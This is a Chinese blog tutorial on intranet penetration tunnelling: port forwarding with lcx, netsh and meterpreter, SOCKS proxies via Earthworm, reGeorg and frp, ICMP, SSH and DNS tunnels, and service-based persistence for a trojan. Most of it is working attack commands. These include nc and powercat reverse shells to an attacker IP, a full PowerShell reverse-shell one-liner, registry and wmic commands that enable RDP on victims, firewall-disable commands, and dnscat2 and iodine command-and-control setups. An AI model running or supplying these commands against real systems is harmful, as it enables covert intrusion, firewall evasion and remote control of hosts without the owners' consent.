内网渗透之常见隧道转发划水以至于溺水技术。

隧道穿透:端口转发、socket隧道代理 隧道穿透是一种网络技术,通过端口转发和Socket隧道代理实现安全的网络连接,方便不同网络节点之间的数据传输和通信。端口转发是将网络数据包从一个端口转发到另一个端口技术,用于将外部网络请求转发到内部网络。Socket隧道代理利用Socket连接建立隧道,在客户端和服务器端之间传输数据,提高数据传输的安全性和效率。这些方法可以确保数据传输的安全和顺畅,适用于需要跨越不同网络环境进行通信的场景。 阅读详情

内网渗透之常见隧道转发划水以至于溺水技术

  • 越过山丘,才发现无人等候。

一、基本介绍

端口转发:
用于目标机器对某一端口的访问进行了限制,主要就是可以将本机的端口或者是本机可以访问到的任意主机的端口转发到任意一台你需要访问的公网 IP 上。
端口映射:
就是将一个内网无法访问的端口映射到公网上的某个端口,进而进行攻击,例如最喜欢的3389!
内网转发:
主要用于在目标机器上做跳板,进而可以对内网进行攻击!
隐藏隧道:
由于防火墙存在,会检测对外连接情况,如发现异常就会阻断,隧道就是绕过防火墙,封装数据绕过屏蔽的通信方式

二、工具介绍及使用

端口转发

  • 1、Lcx.exe

    lcx.exe是一个端口转发映射工具, Windows版是lcx.exe,Linux版为portmap,主要就三个参数监听映射转向.
    Windows情况下:
    在这里插入图片描述
    目标主机执行
    lcx.exe -slave 公网主机ip 8888 目标ip 3389
    公网主机监听,即可成功映射
    lcx.exe –listen 8888 5555
    在这里插入图片描述
    如果3389被防火墙限制,可以-tran映射到其他端口,进行访问
    lcx -tran 6666 目标ip 3389

    LINUX情况下:
    在这里插入图片描述
    目标主机执行
    ./portmap -m 3 -h1 目标ip -p1 22 -h2 公网ip -p2 8888
    公网主机监听,即可成功映射
    ./portmap -m 2 -p1 8888 -h2 公网ip -p2 12345
    在这里插入图片描述
    ps:如果目标机器没有开启3389?或者找不到远程桌面?在或者饿了?算了,先解决前两个问题吧!

	开启3389端口:
	通杀:
	wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
	2003:
	REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
	2008:
	REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
	多版本win08 win03 win7 win2012 winxp 执行3条:
	1.wmic /namespace:\root\cimv2	erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
    2.wmic /namespace:\root\cimv2	erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
  	3.reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
	开了远程桌面找不到?
	简单暴力办法看看服务器有木有电话qq之类的,直接联系管理员问问,好好的3389端口非得换,不知道我找不到吗?
	不闹了!容易挨打!
	1、cmd执行:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
    2、cmd执行:tasklist /svc查询TermService对应PID,然后在netstat -ano查询的PID对应的端口号
	3、查找注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ Wds dpwd\Tds	cp 中PortNumber的值





  • 2、netsh

    netsh(Network Shell) 是一个windows系统本身自带的工具,可以用来做端口转发。因为他可以把本地端口的任意一个TCP连接都可以被重定向到另一个端口,或远程计算机的任意端口上。
    前提:
    2003、xp系统需要安装IPV6(netsh interface ipv6 install),其他版本直接可以使用。
    启动服务中的IPv6 Helper Service/IP Helper,如果不行可以关闭服务器或添加入栈规则(netsh firewall set opmode disable)
    基本语句

    添加
    netsh interface portproxy add v4tov4 listenaddress=本地 listenport=port connectaddress=ip connectport=port 
    删除
    netsh interface portproxy delete v4tov4 listenport=port
    查看
    netsh interface portproxy show all
    
    

    举个栗子,如果想进行端口转发,可以把来自外部的 tcp 的26端口流量全部转发到内网的机器的3389端口上:

    netsh advfirewall firewall add rule name="8888" dir=in action=allow protocol=TCP localport=26
    
    netsh interface portproxy add v4tov4 listenaddress=ip listenport=26 connectaddress=10.0.0.1 connectport=3389
    
    

    在这里插入图片描述

    3、msf端口转发

    msf的meterpreter内置了端口转发功能,可以把内网的端口转发到本地。

    portfwd add -l 8888 -p 3389 -r 172.16.86.153 #-l为本地监听端口,-p 目标端口,-r 目标ip
    

    然后即可将转发目标主机的3389到本地的8888,直接连接即可rdesktop 127.1.1.0:8888
    portfwd list/delete/flush 列表/删除/清空

内网转发

内网转发也就是隧道技术它通常是将一个网络协议封装为另一个网络协议的payload。

  • 1、Earthworm

    Earthworm 是一套便携式的网络穿透工具,具有 SOCKS5代理、端口转发、端口映射等功能,优点比如穿透能力强,支持多平台等
    在这里插入图片描述

主要三个模块:
正向代理 ssocksd、
反向代理 rcsocks,rssocks
端口转发 lcx_listen,lcx_slave,lcx_tran
首先简单画拓扑,利用服务器当作跳板访问探测内网。
在这里插入图片描述比如想通过跳板机访问内网,也就是正向代理,就是常说的ss,
首先在服务器上监听本地端口./ew_for_linux64 -s ssocksd -l 1080
然后在kali攻击机上执行proxychains+命令即可(在/etc/proxychains.conf添加socks5 22.22.22.2 1080)
在windows下直接设置全局代理即可(ie、Proxifier等)即可访问目标内网服务

有正即有反,如果无法直接连接目标主机,但是目标主机可以主动连接攻击机,这时可以利用ew进行反向代理,只不过方向变了,首先在攻击机上监听1080,将1111带你看流量转到1080端口# ew_for_Win.exe -s rcsocks -l 1080 -e 1111,然后在目标机执行ew_for_Win.exe -s rssocks -d 88.88.88.8 -e 1111相当于将流量转发到攻击机1111端口,攻击者机器通过proxychains或浏览器设置Socks5代理访问目标内网服务

  • 2、reGeorg+proxifier/proxychains

regeorg主要是把内网服务器的端口通过http/https隧道转发到本机。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用webshell建立一个socks代理进行内网穿透,服务器必须支持aspx、php或jsp这些web程序中的一种。
在这里插入图片描述根据服务器上传相应文件,进行代理,直接访问显示“Georg says, ‘All seems fine’”,代表成功。
在这里插入图片描述
然后执行,python reGeorgSocksProxy.py -p 1080 -u http://127.0.0.1/test/tunnel.nosocket.php ,proxifier设置全局代理1080即可,proxychains设置件/etc/proxychains.conf 添加socks5 127.0.0.1 1080即可
在这里插入图片描述

  • 3、frq

    frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议。
    在这里插入图片描述
    首先配置对frpc.ini,然后和frpc.exe一起上传到目标机
    在这里插入图片描述
    服务端frps.ini,设置一样端口8888,运行frpc.exe -c frpc.ini,攻击机执行frps.exe,结合proxifier进行代理,输入账号密码即可
    结束后目标机删除frpc,taskkill /pid 进程号 -t -f

隐藏隧道

1 常见的隧道:

	网络层:ipv6隧道、icmp隧道
	传输层:tco隧道、udp隧道、端口转发
	应用层:ssh隧道、http隧道、https隧道、DNS隧道

网络层

1、ipv6隧道

IPv6协议隧道方法 用于连接处于IPv4海洋中的各孤立的IPv6岛(将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中,使IPv6报文整体封装在IPv4数据报文中,使IPv6报文能够穿过IPv4海洋,到达另一个IP)。此方法要求隧道两端的IPv6节点都是双栈节点(对于IPv4包和IPv6包都使用相同的地址),即也能够发送IPv4包。
IPv6隧道的工作过程如下:

1、节点A要向节点B发送IPv6报文,首先需要在节点A和节点B之间建立一条隧道
2、节点A将IPv6报文封装在以节点B的IPv4地址为目的地址,以自己的IPv4地址为源地址的IPv4报文中,并发往IPv4海洋
3、在IPv4海洋中,这个报文和普通IPv4报文一样,经过IPv4的转发到达节点B
4、节点B收到此报文之后,解除IPv4封装,取出其中的IPv6报文

配置隧道和自动隧道的主要区别在于:只有执行隧道功能的节点的IPv6地址是IPv4兼容地址时,自动隧道才是可行的。在为执行隧道功能的节点建立I P地址时,自动隧道方法无需进行配置;而配置隧道方法则要求隧道末端节点使用其他机制来获得其IPv4地址,例如采用D H C P、人工配置或其他IPv4的配置机制。
支持IPv6的隧道工具有socat、6tunnel、nt6tunnel等

2、icmpc2通道及隧道传输

icmp相当于其他协议更具有隐蔽性,因为防火墙会默认放此协议,当你拿到一台服务器,防火墙禁止外出流量,可以将数据封装在ping中带出,穿过防火墙限制。

  • icmpC2通道
    icmpsh是应该利用icmp反弹shell1的工具,icmpsh的目标主机只能是Windows(不需要管理权限),控制端只能是Linux。
    控制端kali首先下载,并且需要关闭内核对ping的反应,进而执行即可。
git clone https://github.com/inquisb/icmpsh.git
sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py 攻击者ip 目标ip>

在这里插入图片描述
目标系统windows,执行-t

icmpsh.exe -t 攻击者ip

在这里插入图片描述
即可反弹shell
在这里插入图片描述

  • 隧道传输
    将TCP连接通过ICMP封装进行传送的一种方法。
    icmptunnel是一个将流量封装到 ICMP包中的隧道工具,可以绕过防火墙的隐蔽连接。
    攻击端首先安装icmptunnel,然后禁用icmp回应影响。
git clone https://github.com/jamesbarlow/icmptunnel.git 
make
sysctl -w net.ipv4.icmp_echo_ignore_all=1

然后监听tunnel,并且给隧道接口分配一个IP地址

./icmptunnel -s
/sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0

在这里插入图片描述
目标关闭反应,以及连接攻击ip,设置ip

sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmptunnel 攻击ip 
/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0

在这里插入图片描述
通过ICMP连接SSH(前提目标需开启ssh),通过ICMP包建立了点对点隧道。攻击者的隧道IP是10.0.0.1,目标ip的隧道IP是10.0.0.2。传输的每个流量都是ICMP包,ICMP的payload就是封装的HTTP/IP包,所以走的都是icmp。

传输层

1、nc

主要通过tcp和udp的网络连接读取数据等。
获取shell

正向shell:客户端想要获取服务器shell

	客户端监听
nc -lvp 8888 -e /bin/sh 
nc -lvp 8888 -e c:\windows\system32\cmd.exe 
	服务端反弹
	nc 服务端ip 8888

反向shell:服务端想要获取客户端器shell

客户端监听
nc -lvp 8888 
服务端反弹
nc ip 8888 -e /bin/sh 
nc ip 8888 -e c:\windows\system32\cmd.exe 

场景 :攻击机->防火墙-》服务器和数据库同一内网(攻击可以访问服务器,访问不了数据库)
攻击机监听
nc -lvp 8888
数据库
nv -lvp 8888 -e /bin/sh
web服务器
nc -v 攻击ip 8888 -c "nc -v 数据库ip 8888"
然后攻击机即可访问数据库。

2、powercat

PowerCat是NetCat的PowerShell形式,使用也一样
正向连接:Windows上反弹shell到kali

Kali: 
    nc -lvp 8888
Windows: 
    Import-Module .\powercat.ps1
    powercat -c kaliip -p 8888 -e c:\windows\system32\cmd.exe

反向连接:Windows上反向连接到kali

Kali:
    nc 目标ip 8888 -vv
Windows:
    Import-Module .\powercat.ps1
    powercat -lvp 8888 -e c:\windows\system32\cmd.exe 

Windows之间互弹shell

w7监听:
Import-Module .\powercat.ps1
powercat -lvp 8888
w10连接:
Import-Module .\powercat.ps1
powercat -c 192.168.10.1 -p 8888 -ep
or
w7监听:
Import-Module .\powercat.ps1
powercat -lvp 8888
w10连接:
.\reverse.ps1
ps1=$client = New-Object System.Net.Sockets.TCPClient('192.168.10.1',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Powercat传输文件

接收端:
    Import-Module .\powercat.ps1
    powercat -lvp 8888 -of test.txt 
发送端:
    Import-Module .\powercat.ps1
    powercat -c 192.168.10.1 -p 8888 -i C:\Users\Desktop\test.txt -v

PowerCat进行DNS隧道通信
PowerCat也是一套基于DNS通信的协议,PowerCat的DNS通信是基于dnscat

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

然后ruby dnscat2.rb ttpowercat.test -e open --no-cache
目标执行
powercat -c kaliip -p 53 -dns ttpowercat.test -e cmd.exe
然后kali执行 session -i 1即可
场景 :攻击机->防火墙-》w7和w10同一内网(攻击机以w7做跳板访问w10)
w10执行
powercat -lvp 8888 -e cmd.exe
w7执行
powercat -lvp 9999 -r tcp:ip(w10):8888
最后kali执行,即可访问
nc ip(w7) 9999 -vv
or
dns隧道
w7执行
powercat -l -p 9999 -r dns::ip(w7)::ttpowercat.test
kali执行
ruby dnscat2.rb ttpowercat.test -e open --no-cache
w10执行,即可获取sessions -i 1
powercat -c ip(本机) -p 9999 -v -e cmd.exe

应用层

1、ssh隧道

常用参数

-C 压缩传输
-f 后台传输
-N 建立看不到具体会话的连接
-L 本地端口转发
-g 允许远程主机连接本地用于转发端口
-R 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口
-D 动态转发(socks代理)
-P 指定ssh端口

本地转发
将本地机(客户机)的某个端口转发到远端指定机器的指定端口.
场景:kali- 》防火墙-》web服务器-》内网服务器
目的:kali访问内网服务器3389端口
思路:以web服务器当跳板,将内网服务器3389端口映射到web服务器1234端口,然后访问1234即可访问内网3389
kai上执行

ssh -CfNg -L 1234:内网ip:3389 root@web服务器

然后kali即可访问3389了

远程转发
将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口
场景:kali- 》防火墙-》web服务器-》内网服务器
目的:kali访问内网服务器3389端口
思路:以web服务器当跳板,将kali5555端口的流量转发到内网服务器3389端口,访问5555即可访问内网服务器3389
web服务器上执行

ssh -CfNg -R 5555:内网ip:3389 root@kaliip

然后kali访问5555即可
动态转发
建立一个ssh加密的socks4/5代理通道,只要支持socks4/5的都可以使用该隧道通信
场景:kali- 》防火墙-》web服务器-》内网服务器80web服务
目的:kali通过浏览器访问内网服务器80web服务
思路:在kali建立以web服务器基础的sockets5隧道,然后浏览器设置sockets代理,即可访问内网web80web服务器
kai上执行

ssh -CfNg -D 1234 root@web服务器ip
然后挂上浏览器sockets代理即可访问。

ssh反向隧道
简单的来说就是在目标内网机上做到公网服务器的反向代理;然后在公网服务器做正向的代理实现内网到公网的转发
目标内网服务器:ssh -fCNR 192.168.119.129:8888:localhost:22 root@192.168.119.129 #将本机的22号端口的流量都转发给公网服务器8888端口
在这里插入图片描述然后公网服务器执行ssh -fCNL *:1111:localhost:8888 localhost #、将公网服务器的1111端口的流量都转发给服务器的8888端口
在这里插入图片描述
然后即可直接连接公网服务器1111端口,即使连接到目标内网服务器。ssh -p 1111 root@公网ip
在这里插入图片描述这种方法不稳定,可以利用AutoSSH建立稳定SSH隧道
首先目标内网服务器和公网服务器apt install autossh
目标内网服务器生成ssh-keygen公钥私钥,并ssh-copy-id root@ip到公网服务器中,实现免密登陆
在这里插入图片描述
最后执行 autossh -M 5000 -NR 8888:localhost:22 root@xxx.xxx.xxx.xxx -p 22) 同理上即可
在这里插入图片描述

2、HTTP/HTTPS隧道

常见的regeorg、meterperter、tunna等,利用http隧道进行代理,在爆破3389等比较隐蔽,特征不明显。

3、DNS隧道

DNS协议解析过程分为两种,迭代查询和递归查询(一次请求),DNS隧道是隐蔽信道的一种,通过将其他协议封装在DNS协议中进行通信。封装由客户端完成,将DNS流量还原成正常的流量由服务器完成。
常用的工具Dnscat2、iodine、Dns2tcp等

  • Dnscat2
    dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,解析常见的类型:A、CNAME、MX、TXT……类型,它的优点就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成比如文件上传、下载、反弹Shell,
    在服务端机器上,执行:

    服务端

sudo ruby./dnscat2.rb abc.com --secret=123456   #1,自定义DNS传输的域名以及密码
sudo ruby./dnscat2.rb --dns server=127.0.0.1,port=5555,type=TXT --secret=123456   #2,监听本机5555
sudo ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache   #方式3
客户端
dnscat --secret=123456 abc.com    #1
dnscat --dns server=dnscat2 server ip>,port=5555,type=TXT   #2

客户端连上后,会提示:Session established!
服务端的控制台输入:windows,即可以看到一个客户端上线:

使用window -i 1,即可进入该通道;

常用的有:

quit (退出控制台)
kill <id> (中断通道)
set(设值,比如设置security=open)
windows(列举出所有的通道)
window -i <id>(连接某个通道)

连接通道后,:

clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell)
download/upload(两端之间上传下载文件)
supend(返回到上一层,等于快捷键ctrl+z)
  • iodine
    iodine这个工具可以大致分为中继和直连两种类型,中继需要在外网有自己的服务器,迭代请求,直连在客户端直接向指定IP的恶意DNS服务器发起DNS解析请求,而且传输文件的速度非常快,是一种主流工具。iodine主要分服务端与客户端。当客户端请求该域名的解析,就可以建立通道连接。iodine支持各种系统以及NULL,TXT,SRV,MX,CNAME,A等多种查询请求类型。
    客户端:
	客户端:sudo iodine -f -r xxx.com -M 200 -P 123456 //xxx.com为自定义DNS传输的主域名

服务端:

sudo iodine -P 123456 -f -r -T TXT <dns服务商,不写就直连> abc.com

-r 强制在任何情况下使用DNS隧道
-f 将使客户端保持在前台运行
-t 使用的DNS类型
-M 表示最大的上传域名长度

维持后门

比如利用NSSM,封装某一木马软件exe封装为系统服务,然后服务器设置自动启动即可。
在这里插入图片描述删除利用nssm remove

余生很长,请多指教。
在这里插入图片描述

CCProxy+Proxifier工具的用法 阅读详情

相关推荐

app测试-Proxifier转发使用突破代理&&xp框架突破证书-突破虚拟检测

0x00 简介 前期的抓包介绍到了使用脚本通杀代理证书的限制,但是需要抓取到wireshark分析,今天介绍: 1、使用proxifier突破模拟器的本地代理限制, 2、使用xp框架突破证书限制,实现联动bp抓取http协议数据包, 3、突破虚拟的检测的简述 0x01 proxifier突破代理限制检测 首先介绍一下突破本地代理到底是个什么情况 1,本地开启代理指向bp,bp无法获取流量被模拟器代理限制 流量走向:app->代理地址指向bp 2,配合proxifier突破代理 流量走向:app-&gt

告白的博客 2953

内网代理转发工具

通过这段对socks代理的描述,可知socks代理其实可理解为一个增强版的 lcx -tran 它在服务端监听一个服务端口(ConnectPort),当有新的连接请求时会从socks协议中解析出访问目标的URL(TransmitHost)的目标端口(TransmitPort),再开始执行lcx -tran 的具体功能。一个代理的是客户端,一个代理的是服务器,实际上proxy在两种代理中做的事都是代为收发请求和响应,不过从结构上来看正好左右互换了下,所以把前者那种代理方式叫做正向代理,后者叫做反向代理。

Hacker_Fuchen的博客 1709

网络靶场实战-记一次大型内网渗透实践 【完结篇】

本场景基于某业务架构进行搭建,场景内包含了100余台主机以及20余子网,内置相关应用,包括Web服务、邮件服务、文件服务、OA服务等,但本场景多通过水坑攻击、钓鱼攻击、服务爆破等相关技术,其中包含了Chrome漏洞利用、Office漏洞利用等。通过本场景可以进行相关攻防技术训练。

蛇矛实验室 2383

无脑装了一个Proxifier导致我一整天重启了无数遍电脑

文章分享了在Windows系统中使用Proxifier强制全局代理时遇到的网络故障及排查过程。作者发现安装Proxifier后无法上网,误以为是软件残留导致,但最终发现是代理节点失效。文中提供了详细的排查步骤,包括检查代理连通性、重置网络栈、清理驱动残留及防火墙规则,并附上清理Proxifier的PowerShell脚本和代理开关脚本。建议遇到类似问题时优先验证代理节点可用性,避免盲目排查...

AlbertS Home of Technology 4336

Proxifier+BurpSuite 抓包安全测试全指南:原理、配置与实战

1. Proxifier+BurpSuite的核心价值:解决了“非标准代理场景”的抓包难题,尤其适合微信小程序、PC客户端等绕过系统代理的应用;2. 配置关键:Burp的监听器与证书信任是基础,Proxifier的进程规则与优先级是核心,两者参数必须完全一致;3. 工具定位:Proxifier是“流量引导员”,负责把目标流量送进Burp;Burp是“安全分析师”,负责流量的拦截、分析与测试。抓包与安全测试必须在「授权范围内」进行,严禁对非授权系统实施测试,避免违反《网络安全法》等相关法律法规。

安全渗透Hacker的博客 1886

用Proxifier只代理PC端部分软件

mitmproxy监测,proxifier代理部分软件 proxifier下载 1、添加代理信息 (1)打开cmd窗口使用ipconfig命令:查询ipv4地址 (2)打开Proxifier>配置文件>代理服务器:添加ipv4地址、端口、类型 2、配置规则 (1)选择需要代理的软件,如微信,右击查看属性,找到软件可执行文件名称如WeChat.exe: (2)打开Prox...

十一姐的博客 1万+

内网端口转发与代理

内网端口转发与代理

xiaolan458的专栏 1469

windows命令提示符cmd常用命令

首先,打开"运行"对话框(Win+R),输入cmd,打开控制台命令窗口... { 也可以通过cmd /c 命令和cmd /k 命令的方式来直接运行命令 注:/c表示执行完命令后关闭cmd窗口;/k表示执行完命令后保留cmd窗口 } # 控制台命令窗口中一些技巧 [1].复制内容:右键弹出快捷菜单,选择“标记(K)”,然后选中所需复制的内容,然后右键即可 ...

a2860049的博客 3434

内网之一次失败的域渗透

VMnet1 52(内网) VMnet2 72 (公网) Kali: 192.168.72.129 Win7:192.168.72.128 攻击机: Web渗透: 扫描端口:开启了80和3306端口 测试3306禁止远程登陆 访问80端口 扫描目录 访问http://192.168.72.128/yxcms 扫描目录 百度找到后台地址http://192.168.72.128/yxcms//index.php?r=admin/index/login ..

shy的博客 541

《红蓝攻防对抗实战》十三.内网穿透之利用HTTP协议进行隧道穿透

本文介绍了利用HTTP协议进行隧道穿透的方法。WEB tunnel即WEB隧道,可以进行局域网穿透控制,通过web tunnel可以桥接到局域网内的所有网络设备,让远程访问此设备就像在局域网内访问此设备一样。Web隧道允许用户通过HTTP连接发送非HTTP流量,这样就可以在HTTP上携带其他协议数据。Web tunnel适用于当目标开启防火墙时,此时入站和出站连接都受到限制,除了WEB服务的端口(80或443)。

一只特立独行的兔先森 2894

内网渗透-实战|手把手教你如何进行内网渗透

内网渗透-实战|手把手教你如何进行内网渗透

lza20001103的博客 9470

项目五linux 内网完整渗透测试实例笔记

本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。在 wdcp 生成秘钥保存下来 在 kali 设置权限 600你知道什么叫幸福嘛?幸福就是拍拍手。

qq_56426046的博客 2607

JSP实现HTTP隧道

共有两个java类和一个servlet(在同一个java包JavaSerializable中):java:StudentList   StudentListTunnetApp(客户端)servlet:StudentListTunnetServlet(服务器端)StudentList(java类)定义一个类,StudentListTunnetApp(java类)运

Sir_LuciFer的专栏 1005

实战 | 手把手教你如何进行内网渗透

内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。

jennycisp的博客 2245

渗透测试之内网渗透学习,超详细

渗透测试之内网渗透学习,超详细

z099164的博客 5794

使用socat ipv6 转发 ipv4端口

1.socatWindows版下载 https://github.com/tech128/socat-1.7.3.0-windows 2.使用方法 socat.exe TCP6-LISTEN:10090,reuseaddr,fork tcp4:192.168.2.18:10090 监听本地ipv6 10090端口转发到本地ipv6 10090

烛下海棠的博客 4654

「实战」网络安全学习:内网渗透实例

从linux打进去到域环境,到获取域控权限。全篇实操==(全套教程文末领取哈)==

WANGJUNAIJIAO的博客 673
上一篇: Windows/Linux 下nc 反弹shell
下一篇: phpMyAdmin 漏洞小集合
SoulCat.
博客等级 码龄16年 206粉丝 45原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值